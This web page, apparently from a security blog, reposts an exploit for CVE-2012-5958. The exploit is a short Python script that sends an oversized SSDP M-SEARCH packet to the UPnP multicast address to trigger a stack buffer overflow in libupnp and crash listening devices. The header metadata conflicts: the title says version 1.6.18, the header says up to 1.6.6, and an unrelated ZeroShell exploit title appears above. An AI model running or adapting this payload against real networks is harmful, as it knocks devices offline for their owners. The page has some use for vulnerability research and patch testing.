ZeroShell 3.9.0 - 'cgi-bin/kerbynet' Remote Root Command Injection

libupnp 1.6.18 – Stack-based buffer overflow (DoS)Denial Of Service Exploit

Date: 2020-11-27

Platform: Multiple

CVE: 2012-5958

# Exploit Title: libupnp 1.6.18 - Stack-based buffer overflow (DoS)
# Exploit Author: Patrik Lantz
# Vendor Homepage: https://pupnp.sourceforge.io/
# Software Link: https://sourceforge.net/projects/pupnp/files/pupnp/libUPnP%201.6.6/libupnp-1.6.6.tar.bz2/download
# Version: <= 1.6.6
# Tested on: Linux
# CVE : CVE-2012-5958

import socket

payload = "M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\nST:uuid:schemas:device:"
payload += "A"*324 + "BBBB"
payload += ":urn:\r\nMX:2\r\nMAN:\"ssdp:discover\"\r\n\r\n"

byte_message = bytes(payload)
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(byte_message, ("239.255.255.250", 1900))
Bookmark
RiSec.n0tst3
Connect
Share the word, let's increase Cybersecurity Awareness as we know it
Recommended:  osCommerce 2.3.4.1 - 'title' Persistent Cross-Site Scripting

Leave a Comment

Your email address will not be published. Required fields are marked *

RiSec Captcha 33 − = 26